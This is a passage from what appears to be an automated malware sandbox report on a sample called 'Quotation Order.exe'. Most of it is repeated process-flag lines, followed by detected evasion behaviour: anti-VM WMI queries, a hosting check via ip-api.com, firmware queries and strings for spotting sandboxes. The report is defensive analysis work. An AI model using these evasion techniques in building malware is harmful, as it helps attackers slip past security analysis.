                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Quotation Order.exe PID: 7384, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7412, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6284, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Quotation Order.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C09BE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4FDE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C09BE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4FDE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C05A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4BCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLP
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C05A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4BCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAMEP
                    Source: C:\Users\user\Desktop\Quotation Order.exeMemory allocated: 259E9C40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeMemory allocated: 259EB650000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 153BEAF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 153D85A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1FC8F1B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1FCA71B0000 memory reserve | memory write watchJump to behavior
